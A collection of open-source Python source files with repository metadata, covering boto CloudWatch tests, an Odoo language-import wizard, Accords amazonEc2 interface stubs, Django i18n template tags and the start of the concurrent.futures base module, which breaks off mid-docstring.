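#   isIPAddress('192.168.0.1')   # True
#   isIPAddress('256.0.0.1')     # False (octet out of range)
#   isIPAddress('example.com')   # False
#
# A minimal pull-producer sketch for registerProducer(); `transport` is a
# hypothetical connected FileDescriptor subclass:
#
#   class OneShotProducer:
#       def resumeProducing(self):
#           transport.write("hello")
#           transport.unregisterProducer()
#       def stopProducing(self):
#           pass
#   transport.registerProducer(OneShotProducer(), streaming=False)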
|
gpl-3.0
|
dablak/boto
|
tests/integration/ec2/cloudwatch/test_connection.py
|
22
|
11787
|
# Copyright (c) 2010 Hunter Blanks http://artifex.org/~hblanks/
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Initial, and very limited, unit tests for CloudWatchConnection.
"""
import datetime
import time
import unittest
from boto.ec2.cloudwatch import CloudWatchConnection
from boto.ec2.cloudwatch.metric import Metric
# HTTP response body for CloudWatchConnection.describe_alarms
DESCRIBE_ALARMS_BODY = """<DescribeAlarmsResponse xmlns="http://monitoring.amazonaws.com/doc/2010-08-01/">
<DescribeAlarmsResult>
<NextToken>mynexttoken</NextToken>
<MetricAlarms>
<member>
<StateUpdatedTimestamp>2011-11-18T23:43:59.111Z</StateUpdatedTimestamp>
<InsufficientDataActions/>
<StateReasonData>{"version":"1.0","queryDate":"2011-11-18T23:43:59.089+0000","startDate":"2011-11-18T23:30:00.000+0000","statistic":"Maximum","period":60,"recentDatapoints":[1.0,null,null,null,null,null,null,null,null,null,1.0],"threshold":1.0}</StateReasonData>
<AlarmArn>arn:aws:cloudwatch:us-east-1:1234:alarm:FancyAlarm</AlarmArn>
<AlarmConfigurationUpdatedTimestamp>2011-11-18T23:43:58.489Z</AlarmConfigurationUpdatedTimestamp>
<AlarmName>FancyAlarm</AlarmName>
<StateValue>OK</StateValue>
<Period>60</Period>
<OKActions/>
<ActionsEnabled>true</ActionsEnabled>
<Namespace>AcmeCo/Cronjobs</Namespace>
<EvaluationPeriods>15</EvaluationPeriods>
<Threshold>1.0</Threshold>
<Statistic>Maximum</Statistic>
<AlarmActions>
<member>arn:aws:sns:us-east-1:1234:Alerts</member>
</AlarmActions>
<StateReason>Threshold Crossed: 2 datapoints were not less than the threshold (1.0). The most recent datapoints: [1.0, 1.0].</StateReason>
<Dimensions>
<member>
<Name>Job</Name>
<Value>ANiceCronJob</Value>
</member>
</Dimensions>
<ComparisonOperator>LessThanThreshold</ComparisonOperator>
<MetricName>Success</MetricName>
</member>
<member>
<StateUpdatedTimestamp>2011-11-19T08:09:20.655Z</StateUpdatedTimestamp>
<InsufficientDataActions/>
<StateReasonData>{"version":"1.0","queryDate":"2011-11-19T08:09:20.633+0000","startDate":"2011-11-19T08:07:00.000+0000","statistic":"Maximum","period":60,"recentDatapoints":[1.0],"threshold":1.0}</StateReasonData>
<AlarmArn>arn:aws:cloudwatch:us-east-1:1234:alarm:SuprtFancyAlarm</AlarmArn>
<AlarmConfigurationUpdatedTimestamp>2011-11-19T16:20:19.687Z</AlarmConfigurationUpdatedTimestamp>
<AlarmName>SuperFancyAlarm</AlarmName>
<StateValue>OK</StateValue>
<Period>60</Period>
<OKActions/>
<ActionsEnabled>true</ActionsEnabled>
<Namespace>AcmeCo/CronJobs</Namespace>
<EvaluationPeriods>60</EvaluationPeriods>
<Threshold>1.0</Threshold>
<Statistic>Maximum</Statistic>
<AlarmActions>
<member>arn:aws:sns:us-east-1:1234:alerts</member>
</AlarmActions>
<StateReason>Threshold Crossed: 1 datapoint (1.0) was not less than the threshold (1.0).</StateReason>
<Dimensions>
<member>
<Name>Job</Name>
<Value>ABadCronJob</Value>
</member>
</Dimensions>
<ComparisonOperator>GreaterThanThreshold</ComparisonOperator>
<MetricName>Success</MetricName>
</member>
</MetricAlarms>
</DescribeAlarmsResult>
<ResponseMetadata>
<RequestId>f621311-1463-11e1-95c3-312389123</RequestId>
</ResponseMetadata>
</DescribeAlarmsResponse>"""
class CloudWatchConnectionTest(unittest.TestCase):
ec2 = True
def test_build_list_params(self):
c = CloudWatchConnection()
params = {}
c.build_list_params(
params, ['thing1', 'thing2', 'thing3'], 'ThingName%d')
expected_params = {
'ThingName1': 'thing1',
'ThingName2': 'thing2',
'ThingName3': 'thing3'
}
self.assertEqual(params, expected_params)
def test_build_put_params_one(self):
c = CloudWatchConnection()
params = {}
c.build_put_params(params, name="N", value=1, dimensions={"D": "V"})
expected_params = {
'MetricData.member.1.MetricName': 'N',
'MetricData.member.1.Value': 1,
'MetricData.member.1.Dimensions.member.1.Name': 'D',
'MetricData.member.1.Dimensions.member.1.Value': 'V',
}
self.assertEqual(params, expected_params)
def test_build_put_params_multiple_metrics(self):
c = CloudWatchConnection()
params = {}
c.build_put_params(params, name=["N", "M"], value=[1, 2], dimensions={"D": "V"})
expected_params = {
'MetricData.member.1.MetricName': 'N',
'MetricData.member.1.Value': 1,
'MetricData.member.1.Dimensions.member.1.Name': 'D',
'MetricData.member.1.Dimensions.member.1.Value': 'V',
'MetricData.member.2.MetricName': 'M',
'MetricData.member.2.Value': 2,
'MetricData.member.2.Dimensions.member.1.Name': 'D',
'MetricData.member.2.Dimensions.member.1.Value': 'V',
}
self.assertEqual(params, expected_params)
def test_build_put_params_multiple_dimensions(self):
c = CloudWatchConnection()
params = {}
c.build_put_params(params, name="N", value=[1, 2], dimensions=[{"D": "V"}, {"D": "W"}])
expected_params = {
'MetricData.member.1.MetricName': 'N',
'MetricData.member.1.Value': 1,
'MetricData.member.1.Dimensions.member.1.Name': 'D',
'MetricData.member.1.Dimensions.member.1.Value': 'V',
'MetricData.member.2.MetricName': 'N',
'MetricData.member.2.Value': 2,
'MetricData.member.2.Dimensions.member.1.Name': 'D',
'MetricData.member.2.Dimensions.member.1.Value': 'W',
}
self.assertEqual(params, expected_params)
def test_build_put_params_multiple_parameter_dimension(self):
from collections import OrderedDict
self.maxDiff = None
c = CloudWatchConnection()
params = {}
dimensions = [OrderedDict((("D1", "V"), ("D2", "W")))]
c.build_put_params(params,
name="N",
value=[1],
dimensions=dimensions)
expected_params = {
'MetricData.member.1.MetricName': 'N',
'MetricData.member.1.Value': 1,
'MetricData.member.1.Dimensions.member.1.Name': 'D1',
'MetricData.member.1.Dimensions.member.1.Value': 'V',
'MetricData.member.1.Dimensions.member.2.Name': 'D2',
'MetricData.member.1.Dimensions.member.2.Value': 'W',
}
self.assertEqual(params, expected_params)
def test_build_get_params_multiple_parameter_dimension1(self):
from collections import OrderedDict
self.maxDiff = None
c = CloudWatchConnection()
params = {}
dimensions = OrderedDict((("D1", "V"), ("D2", "W")))
c.build_dimension_param(dimensions, params)
expected_params = {
'Dimensions.member.1.Name': 'D1',
'Dimensions.member.1.Value': 'V',
'Dimensions.member.2.Name': 'D2',
'Dimensions.member.2.Value': 'W',
}
self.assertEqual(params, expected_params)
def test_build_get_params_multiple_parameter_dimension2(self):
from collections import OrderedDict
self.maxDiff = None
c = CloudWatchConnection()
params = {}
dimensions = OrderedDict((("D1", ["V1", "V2"]), ("D2", "W"), ("D3", None)))
c.build_dimension_param(dimensions, params)
expected_params = {
'Dimensions.member.1.Name': 'D1',
'Dimensions.member.1.Value': 'V1',
'Dimensions.member.2.Name': 'D1',
'Dimensions.member.2.Value': 'V2',
'Dimensions.member.3.Name': 'D2',
'Dimensions.member.3.Value': 'W',
'Dimensions.member.4.Name': 'D3',
}
self.assertEqual(params, expected_params)
def test_build_put_params_invalid(self):
c = CloudWatchConnection()
params = {}
try:
c.build_put_params(params, name=["N", "M"], value=[1, 2, 3])
except:
pass
else:
self.fail("Should not accept lists of different lengths.")
def test_get_metric_statistics(self):
c = CloudWatchConnection()
m = c.list_metrics()[0]
end = datetime.datetime.now()
start = end - datetime.timedelta(hours=24*14)
c.get_metric_statistics(
3600*24, start, end, m.name, m.namespace, ['Average', 'Sum'])
def test_put_metric_data(self):
c = CloudWatchConnection()
now = datetime.datetime.now()
name, namespace = 'unit-test-metric', 'boto-unit-test'
c.put_metric_data(namespace, name, 5, now, 'Bytes')
# Uncomment the following lines for a slower but more thorough
# test. (Hurrah for eventual consistency...)
#
# metric = Metric(connection=c)
# metric.name = name
# metric.namespace = namespace
# time.sleep(60)
# l = metric.query(
# now - datetime.timedelta(seconds=60),
# datetime.datetime.now(),
# 'Average')
# assert l
# for row in l:
# self.assertEqual(row['Unit'], 'Bytes')
# self.assertEqual(row['Average'], 5.0)
def test_describe_alarms(self):
c = CloudWatchConnection()
def make_request(*args, **kwargs):
class Body(object):
def __init__(self):
self.status = 200
def read(self):
return DESCRIBE_ALARMS_BODY
return Body()
c.make_request = make_request
alarms = c.describe_alarms()
self.assertEquals(alarms.next_token, 'mynexttoken')
self.assertEquals(alarms[0].name, 'FancyAlarm')
self.assertEquals(alarms[0].comparison, '<')
self.assertEquals(alarms[0].dimensions, {u'Job': [u'ANiceCronJob']})
self.assertEquals(alarms[1].name, 'SuperFancyAlarm')
self.assertEquals(alarms[1].comparison, '>')
self.assertEquals(alarms[1].dimensions, {u'Job': [u'ABadCronJob']})
if __name__ == '__main__':
unittest.main()
|
mit
|
luiseduardohdbackup/odoo
|
openerp/addons/base/module/wizard/base_import_language.py
|
337
|
2644
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import base64
from tempfile import TemporaryFile
from openerp import tools
from openerp.osv import osv, fields
class base_language_import(osv.osv_memory):
""" Language Import """
_name = "base.language.import"
_description = "Language Import"
_columns = {
'name': fields.char('Language Name', required=True),
'code': fields.char('ISO Code', size=5, help="ISO Language and Country code, e.g. en_US", required=True),
'data': fields.binary('File', required=True),
'overwrite': fields.boolean('Overwrite Existing Terms',
help="If you enable this option, existing translations (including custom ones) "
"will be overwritten and replaced by those in this file"),
}
def import_lang(self, cr, uid, ids, context=None):
if context is None:
context = {}
this = self.browse(cr, uid, ids[0])
if this.overwrite:
context = dict(context, overwrite=True)
fileobj = TemporaryFile('w+')
try:
fileobj.write(base64.decodestring(this.data))
# now we determine the file format
fileobj.seek(0)
first_line = fileobj.readline().strip().replace('"', '').replace(' ', '')
fileformat = first_line.endswith("type,name,res_id,src,value") and 'csv' or 'po'
fileobj.seek(0)
tools.trans_load_data(cr, fileobj, fileformat, this.code, lang_name=this.name, context=context)
finally:
fileobj.close()
return True
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
ow2-compatibleone/accords-platform
|
pyaccords/amazonEc2Interface.py
|
1
|
2282
|
##############################################################################
#copyright 2012, Hamid MEDJAHED & Elyes ZEKRI ([email protected]) #
# Prologue #
#Licensed under the Apache License, Version 2.0 (the "License"); #
#you may not use this file except in compliance with the License. #
#You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
#Unless required by applicable law or agreed to in writing, software #
#distributed under the License is distributed on an "AS IS" BASIS, #
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
#See the License for the specific language governing permissions and #
#limitations under the License. #
##############################################################################
#!/usr/bin/env python
# -*- coding: latin-1 -*-
# Implementation of category CRUD functions
import sys
import pycompdev
import pypacksrc
srcdirectory=pypacksrc.srcpydir+"/pyaccords/pysrc/"
sys.path.append(srcdirectory)
from amazonEc2Class import *
""" Note: amazonEc2 is a python class to interface the accords category :amazonEc2.
-Attributes of this category are members of this class.
-List of attributes:
- name
- flavor
- image
- original
- profile
- node
- price
- account
- number
- rootpass
- reference
- network
- access
- accessip
- floating
- floatingid
- publicaddr
- privateaddr
- firewall
- group
- zone
- hostname
- workload
- when
- state
"""
def amazonEc2_create(amazonEc2):
"""Implement here your function"""
return amazonEc2
def amazonEc2_retrieve(amazonEc2):
"""Implement here your function"""
return amazonEc2
def amazonEc2_update(amazonEc2):
"""Implement here your function"""
return amazonEc2
def amazonEc2_delete(amazonEc2):
"""Implement here your function"""
return amazonEc2
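# Illustrative sketch only (added; not part of the original interface): a CRUD
# handler fills in or reads the category attributes listed above and returns the
# instance. Field names come from that list; the values are placeholders.
#
#   def amazonEc2_retrieve(amazonEc2):
#       amazonEc2.state = "active"         # e.g. reflect the instance state
#       amazonEc2.publicaddr = "0.0.0.0"   # placeholder public address
#       return amazonEc2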
|
apache-2.0
|
Piasy/proxy-searcher
|
site-packages/django/templatetags/i18n.py
|
80
|
16514
|
from __future__ import with_statement
import re
from django.template import (Node, Variable, TemplateSyntaxError,
TokenParser, Library, TOKEN_TEXT, TOKEN_VAR)
from django.template.base import _render_value_in_context
from django.template.defaulttags import token_kwargs
from django.utils import translation
register = Library()
class GetAvailableLanguagesNode(Node):
def __init__(self, variable):
self.variable = variable
def render(self, context):
from django.conf import settings
context[self.variable] = [(k, translation.ugettext(v)) for k, v in settings.LANGUAGES]
return ''
class GetLanguageInfoNode(Node):
def __init__(self, lang_code, variable):
self.lang_code = Variable(lang_code)
self.variable = variable
def render(self, context):
lang_code = self.lang_code.resolve(context)
context[self.variable] = translation.get_language_info(lang_code)
return ''
class GetLanguageInfoListNode(Node):
def __init__(self, languages, variable):
self.languages = Variable(languages)
self.variable = variable
def get_language_info(self, language):
# ``language`` is either a language code string or a sequence
# with the language code as its first item
if len(language[0]) > 1:
return translation.get_language_info(language[0])
else:
return translation.get_language_info(str(language))
def render(self, context):
langs = self.languages.resolve(context)
context[self.variable] = [self.get_language_info(lang) for lang in langs]
return ''
class GetCurrentLanguageNode(Node):
def __init__(self, variable):
self.variable = variable
def render(self, context):
context[self.variable] = translation.get_language()
return ''
class GetCurrentLanguageBidiNode(Node):
def __init__(self, variable):
self.variable = variable
def render(self, context):
context[self.variable] = translation.get_language_bidi()
return ''
class TranslateNode(Node):
def __init__(self, filter_expression, noop, asvar=None,
message_context=None):
self.noop = noop
self.asvar = asvar
self.message_context = message_context
self.filter_expression = filter_expression
if isinstance(self.filter_expression.var, basestring):
self.filter_expression.var = Variable(u"'%s'" %
self.filter_expression.var)
def render(self, context):
self.filter_expression.var.translate = not self.noop
if self.message_context:
self.filter_expression.var.message_context = (
self.message_context.resolve(context))
output = self.filter_expression.resolve(context)
value = _render_value_in_context(output, context)
if self.asvar:
context[self.asvar] = value
return ''
else:
return value
class BlockTranslateNode(Node):
def __init__(self, extra_context, singular, plural=None, countervar=None,
counter=None, message_context=None):
self.extra_context = extra_context
self.singular = singular
self.plural = plural
self.countervar = countervar
self.counter = counter
self.message_context = message_context
def render_token_list(self, tokens):
result = []
vars = []
for token in tokens:
if token.token_type == TOKEN_TEXT:
result.append(token.contents)
elif token.token_type == TOKEN_VAR:
result.append(u'%%(%s)s' % token.contents)
vars.append(token.contents)
return ''.join(result), vars
def render(self, context):
if self.message_context:
message_context = self.message_context.resolve(context)
else:
message_context = None
tmp_context = {}
for var, val in self.extra_context.items():
tmp_context[var] = val.resolve(context)
# Update() works like a push(), so corresponding context.pop() is at
# the end of function
context.update(tmp_context)
singular, vars = self.render_token_list(self.singular)
# Escape all isolated '%'
singular = re.sub(u'%(?!\()', u'%%', singular)
if self.plural and self.countervar and self.counter:
count = self.counter.resolve(context)
context[self.countervar] = count
plural, plural_vars = self.render_token_list(self.plural)
plural = re.sub(u'%(?!\()', u'%%', plural)
if message_context:
result = translation.npgettext(message_context, singular,
plural, count)
else:
result = translation.ungettext(singular, plural, count)
vars.extend(plural_vars)
else:
if message_context:
result = translation.pgettext(message_context, singular)
else:
result = translation.ugettext(singular)
data = dict([(v, _render_value_in_context(context.get(v, ''), context)) for v in vars])
context.pop()
try:
result = result % data
except KeyError:
with translation.override(None):
result = self.render(context)
return result
class LanguageNode(Node):
def __init__(self, nodelist, language):
self.nodelist = nodelist
self.language = language
def render(self, context):
with translation.override(self.language.resolve(context)):
output = self.nodelist.render(context)
return output
@register.tag("get_available_languages")
def do_get_available_languages(parser, token):
"""
This will store a list of available languages
in the context.
Usage::
{% get_available_languages as languages %}
{% for language in languages %}
...
{% endfor %}
This will just pull the LANGUAGES setting from
your settings file (or the default settings) and
put it into the named variable.
"""
args = token.contents.split()
if len(args) != 3 or args[1] != 'as':
raise TemplateSyntaxError("'get_available_languages' requires 'as variable' (got %r)" % args)
return GetAvailableLanguagesNode(args[2])
@register.tag("get_language_info")
def do_get_language_info(parser, token):
"""
This will store the language information dictionary for the given language
code in a context variable.
Usage::
{% get_language_info for LANGUAGE_CODE as l %}
{{ l.code }}
{{ l.name }}
{{ l.name_local }}
{{ l.bidi|yesno:"bi-directional,uni-directional" }}
"""
args = token.contents.split()
if len(args) != 5 or args[1] != 'for' or args[3] != 'as':
raise TemplateSyntaxError("'%s' requires 'for string as variable' (got %r)" % (args[0], args[1:]))
return GetLanguageInfoNode(args[2], args[4])
@register.tag("get_language_info_list")
def do_get_language_info_list(parser, token):
"""
This will store a list of language information dictionaries for the given
language codes in a context variable. The language codes can be specified
either as a list of strings or a settings.LANGUAGES style tuple (or any
sequence of sequences whose first items are language codes).
Usage::
{% get_language_info_list for LANGUAGES as langs %}
{% for l in langs %}
{{ l.code }}
{{ l.name }}
{{ l.name_local }}
{{ l.bidi|yesno:"bi-directional,uni-directional" }}
{% endfor %}
"""
args = token.contents.split()
if len(args) != 5 or args[1] != 'for' or args[3] != 'as':
raise TemplateSyntaxError("'%s' requires 'for sequence as variable' (got %r)" % (args[0], args[1:]))
return GetLanguageInfoListNode(args[2], args[4])
@register.filter
def language_name(lang_code):
return translation.get_language_info(lang_code)['name']
@register.filter
def language_name_local(lang_code):
return translation.get_language_info(lang_code)['name_local']
@register.filter
def language_bidi(lang_code):
return translation.get_language_info(lang_code)['bidi']
@register.tag("get_current_language")
def do_get_current_language(parser, token):
"""
This will store the current language in the context.
Usage::
{% get_current_language as language %}
This will fetch the currently active language and
put its value into the ``language`` context
variable.
"""
args = token.contents.split()
if len(args) != 3 or args[1] != 'as':
raise TemplateSyntaxError("'get_current_language' requires 'as variable' (got %r)" % args)
return GetCurrentLanguageNode(args[2])
@register.tag("get_current_language_bidi")
def do_get_current_language_bidi(parser, token):
"""
This will store the current language layout in the context.
Usage::
{% get_current_language_bidi as bidi %}
This will fetch the currently active language's layout and
put its value into the ``bidi`` context variable.
True indicates right-to-left layout, otherwise left-to-right
"""
args = token.contents.split()
if len(args) != 3 or args[1] != 'as':
raise TemplateSyntaxError("'get_current_language_bidi' requires 'as variable' (got %r)" % args)
return GetCurrentLanguageBidiNode(args[2])
@register.tag("trans")
def do_translate(parser, token):
"""
This will mark a string for translation and will
translate the string for the current language.
Usage::
{% trans "this is a test" %}
This will mark the string for translation so it will
be pulled out by makemessages into the .po files
and will run the string through the translation engine.
There is a second form::
{% trans "this is a test" noop %}
This will only mark for translation, but will return
the string unchanged. Use it when you need to store
values into forms that should be translated later on.
You can use variables instead of constant strings
to translate stuff you marked somewhere else::
{% trans variable %}
This will just try to translate the contents of
the variable ``variable``. Make sure that the string
in there is something that is in the .po file.
It is possible to store the translated string into a variable::
{% trans "this is a test" as var %}
{{ var }}
Contextual translations are also supported::
{% trans "this is a test" context "greeting" %}
This is equivalent to calling pgettext instead of (u)gettext.
"""
class TranslateParser(TokenParser):
def top(self):
value = self.value()
# Backwards Compatibility fix:
# FilterExpression does not support single-quoted strings,
# so we make a cheap localized fix in order to maintain
# backwards compatibility with existing uses of ``trans``
# where single quote use is supported.
if value[0] == "'":
m = re.match("^'([^']+)'(\|.*$)", value)
if m:
value = '"%s"%s' % (m.group(1).replace('"','\\"'), m.group(2))
elif value[-1] == "'":
value = '"%s"' % value[1:-1].replace('"','\\"')
noop = False
asvar = None
message_context = None
while self.more():
tag = self.tag()
if tag == 'noop':
noop = True
elif tag == 'context':
message_context = parser.compile_filter(self.value())
elif tag == 'as':
asvar = self.tag()
else:
raise TemplateSyntaxError(
"Only options for 'trans' are 'noop', " \
"'context \"xxx\"', and 'as VAR'.")
return value, noop, asvar, message_context
value, noop, asvar, message_context = TranslateParser(token.contents).top()
return TranslateNode(parser.compile_filter(value), noop, asvar,
message_context)
@register.tag("blocktrans")
def do_block_translate(parser, token):
"""
This will translate a block of text with parameters.
Usage::
{% blocktrans with bar=foo|filter boo=baz|filter %}
This is {{ bar }} and {{ boo }}.
{% endblocktrans %}
Additionally, this supports pluralization::
{% blocktrans count count=var|length %}
There is {{ count }} object.
{% plural %}
There are {{ count }} objects.
{% endblocktrans %}
This is much like ngettext, only in template syntax.
The "var as value" legacy format is still supported::
{% blocktrans with foo|filter as bar and baz|filter as boo %}
{% blocktrans count var|length as count %}
Contextual translations are supported::
{% blocktrans with bar=foo|filter context "greeting" %}
This is {{ bar }}.
{% endblocktrans %}
This is equivalent to calling pgettext/npgettext instead of
(u)gettext/(u)ngettext.
"""
bits = token.split_contents()
options = {}
remaining_bits = bits[1:]
while remaining_bits:
option = remaining_bits.pop(0)
if option in options:
raise TemplateSyntaxError('The %r option was specified more '
'than once.' % option)
if option == 'with':
value = token_kwargs(remaining_bits, parser, support_legacy=True)
if not value:
raise TemplateSyntaxError('"with" in %r tag needs at least '
'one keyword argument.' % bits[0])
elif option == 'count':
value = token_kwargs(remaining_bits, parser, support_legacy=True)
if len(value) != 1:
raise TemplateSyntaxError('"count" in %r tag expected exactly '
'one keyword argument.' % bits[0])
elif option == "context":
try:
value = remaining_bits.pop(0)
value = parser.compile_filter(value)
except Exception:
raise TemplateSyntaxError('"context" in %r tag expected '
'exactly one argument.' % bits[0])
else:
raise TemplateSyntaxError('Unknown argument for %r tag: %r.' %
(bits[0], option))
options[option] = value
if 'count' in options:
countervar, counter = options['count'].items()[0]
else:
countervar, counter = None, None
if 'context' in options:
message_context = options['context']
else:
message_context = None
extra_context = options.get('with', {})
singular = []
plural = []
while parser.tokens:
token = parser.next_token()
if token.token_type in (TOKEN_VAR, TOKEN_TEXT):
singular.append(token)
else:
break
if countervar and counter:
if token.contents.strip() != 'plural':
raise TemplateSyntaxError("'blocktrans' doesn't allow other block tags inside it")
while parser.tokens:
token = parser.next_token()
if token.token_type in (TOKEN_VAR, TOKEN_TEXT):
plural.append(token)
else:
break
if token.contents.strip() != 'endblocktrans':
raise TemplateSyntaxError("'blocktrans' doesn't allow other block tags (seen %r) inside it" % token.contents)
return BlockTranslateNode(extra_context, singular, plural, countervar,
counter, message_context)
@register.tag
def language(parser, token):
"""
This will enable the given language just for this block.
Usage::
{% language "de" %}
This is {{ bar }} and {{ boo }}.
{% endlanguage %}
"""
bits = token.split_contents()
if len(bits) != 2:
raise TemplateSyntaxError("'%s' takes one argument (language)" % bits[0])
language = parser.compile_filter(bits[1])
nodelist = parser.parse(('endlanguage',))
parser.delete_first_token()
return LanguageNode(nodelist, language)
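# Illustrative sketch (not part of the original module): exercising a few of
# the tags above from Python. Assumes a configured Django settings module with
# USE_I18N = True; the template string is hypothetical.
def _example_render_i18n_tags():
    from django.template import Template, Context
    t = Template(
        "{% load i18n %}"
        "{% get_current_language as lang %}"
        "{% trans 'Hello' %} ({{ lang }})"
    )
    return t.render(Context({}))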
|
mit
|
abspoel/YouCompleteMe
|
third_party/pythonfutures/concurrent/futures/_base.py
|
89
|
19642
|
# Copyright 2009 Brian Quinlan. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
from __future__ import with_statement
import logging
import threading
import time
try:
from collections import namedtuple
except ImportError:
from concurrent.futures._compat import namedtuple
__author__ = 'Brian Quinlan ([email protected])'
FIRST_COMPLETED = 'FIRST_COMPLETED'
FIRST_EXCEPTION = 'FIRST_EXCEPTION'
ALL_COMPLETED = 'ALL_COMPLETED'
_AS_COMPLETED = '_AS_COMPLETED'
# Possible future states (for internal use by the futures package).
PENDING = 'PENDING'
RUNNING = 'RUNNING'
# The future was cancelled by the user...
CANCELLED = 'CANCELLED'
# ...and _Waiter.add_cancelled() was called by a worker.
CANCELLED_AND_NOTIFIED = 'CANCELLED_AND_NOTIFIED'
FINISHED = 'FINISHED'
_FUTURE_STATES = [
PENDING,
RUNNING,
CANCELLED,
CANCELLED_AND_NOTIFIED,
FINISHED
]
_STATE_TO_DESCRIPTION_MAP = {
PENDING: "pending",
RUNNING: "running",
CANCELLED: "cancelled",
CANCELLED_AND_NOTIFIED: "cancelled",
FINISHED: "finished"
}
# Logger for internal use by the futures package.
LOGGER = logging.getLogger("concurrent.futures")
class Error(Exception):
"""Base class for all future-related exceptions."""
pass
class CancelledError(Error):
"""The Future was cancelled."""
pass
class TimeoutError(Error):
"""The operation exceeded the given deadline."""
pass
class _Waiter(object):
"""Provides the event that wait() and as_completed() block on."""
def __init__(self):
self.event = threading.Event()
self.finished_futures = []
def add_result(self, future):
self.finished_futures.append(future)
def add_exception(self, future):
self.finished_futures.append(future)
def add_cancelled(self, future):
self.finished_futures.append(future)
class _AsCompletedWaiter(_Waiter):
"""Used by as_completed()."""
def __init__(self):
super(_AsCompletedWaiter, self).__init__()
self.lock = threading.Lock()
def add_result(self, future):
with self.lock:
super(_AsCompletedWaiter, self).add_result(future)
self.event.set()
def add_exception(self, future):
with self.lock:
super(_AsCompletedWaiter, self).add_exception(future)
self.event.set()
def add_cancelled(self, future):
with self.lock:
super(_AsCompletedWaiter, self).add_cancelled(future)
self.event.set()
class _FirstCompletedWaiter(_Waiter):
"""Used by wait(return_when=FIRST_COMPLETED)."""
def add_result(self, future):
super(_FirstCompletedWaiter, self).add_result(future)
self.event.set()
def add_exception(self, future):
super(_FirstCompletedWaiter, self).add_exception(future)
self.event.set()
def add_cancelled(self, future):
super(_FirstCompletedWaiter, self).add_cancelled(future)
self.event.set()
class _AllCompletedWaiter(_Waiter):
"""Used by wait(return_when=FIRST_EXCEPTION and ALL_COMPLETED)."""
def __init__(self, num_pending_calls, stop_on_exception):
self.num_pending_calls = num_pending_calls
self.stop_on_exception = stop_on_exception
self.lock = threading.Lock()
super(_AllCompletedWaiter, self).__init__()
def _decrement_pending_calls(self):
with self.lock:
self.num_pending_calls -= 1
if not self.num_pending_calls:
self.event.set()
def add_result(self, future):
super(_AllCompletedWaiter, self).add_result(future)
self._decrement_pending_calls()
def add_exception(self, future):
super(_AllCompletedWaiter, self).add_exception(future)
if self.stop_on_exception:
self.event.set()
else:
self._decrement_pending_calls()
def add_cancelled(self, future):
super(_AllCompletedWaiter, self).add_cancelled(future)
self._decrement_pending_calls()
class _AcquireFutures(object):
"""A context manager that does an ordered acquire of Future conditions."""
def __init__(self, futures):
self.futures = sorted(futures, key=id)
def __enter__(self):
for future in self.futures:
future._condition.acquire()
def __exit__(self, *args):
for future in self.futures:
future._condition.release()
def _create_and_install_waiters(fs, return_when):
if return_when == _AS_COMPLETED:
waiter = _AsCompletedWaiter()
elif return_when == FIRST_COMPLETED:
waiter = _FirstCompletedWaiter()
else:
pending_count = sum(
f._state not in [CANCELLED_AND_NOTIFIED, FINISHED] for f in fs)
if return_when == FIRST_EXCEPTION:
waiter = _AllCompletedWaiter(pending_count, stop_on_exception=True)
elif return_when == ALL_COMPLETED:
waiter = _AllCompletedWaiter(pending_count, stop_on_exception=False)
else:
raise ValueError("Invalid return condition: %r" % return_when)
for f in fs:
f._waiters.append(waiter)
return waiter
def as_completed(fs, timeout=None):
"""An iterator over the given futures that yields each as it completes.
Args:
fs: The sequence of Futures (possibly created by different Executors) to
iterate over.
timeout: The maximum number of seconds to wait. If None, then there
is no limit on the wait time.
Returns:
An iterator that yields the given Futures as they complete (finished or
cancelled).
Raises:
TimeoutError: If the entire result iterator could not be generated
before the given timeout.
"""
if timeout is not None:
end_time = timeout + time.time()
with _AcquireFutures(fs):
finished = set(
f for f in fs
if f._state in [CANCELLED_AND_NOTIFIED, FINISHED])
pending = set(fs) - finished
waiter = _create_and_install_waiters(fs, _AS_COMPLETED)
try:
for future in finished:
yield future
while pending:
if timeout is None:
wait_timeout = None
else:
wait_timeout = end_time - time.time()
if wait_timeout < 0:
raise TimeoutError(
'%d (of %d) futures unfinished' % (
len(pending), len(fs)))
waiter.event.wait(wait_timeout)
with waiter.lock:
finished = waiter.finished_futures
waiter.finished_futures = []
waiter.event.clear()
for future in finished:
yield future
pending.remove(future)
finally:
for f in fs:
f._waiters.remove(waiter)
DoneAndNotDoneFutures = namedtuple(
'DoneAndNotDoneFutures', 'done not_done')
def wait(fs, timeout=None, return_when=ALL_COMPLETED):
"""Wait for the futures in the given sequence to complete.
Args:
fs: The sequence of Futures (possibly created by different Executors) to
wait upon.
timeout: The maximum number of seconds to wait. If None, then there
is no limit on the wait time.
